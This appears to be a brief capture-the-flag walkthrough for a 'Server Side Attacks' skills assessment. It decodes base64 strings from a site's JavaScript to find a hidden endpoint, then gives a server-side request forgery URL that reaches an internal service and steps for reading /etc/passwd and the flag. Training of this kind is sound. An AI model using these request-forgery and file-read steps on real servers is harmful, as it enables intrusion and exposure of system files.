Server Side Attacks
Skills Assessment
tplmap.py can be used to get os-shell easily but not for this case
Go to view-source:http://104.248.160.230:30947/static/jquery.js
Using Decodify tool,
decode the base64 values of var x,y,z
./dcode Ly86cHR0aA== > http://
./dcode dHNvaC5ub2l0YWNvbC53b2RuaXc= > window.location.host
./dcode dHh0LmVnYXNzZW0vMDgwODoxLjAuMC43MjEvLzpwdHRoPXQzM2w/M000M2wxRnQ0aFR0M0cv > =/G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt
Go to http://165.232.98.156:31779/G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt
Try to read /etc/passwd
Read flag
Last updated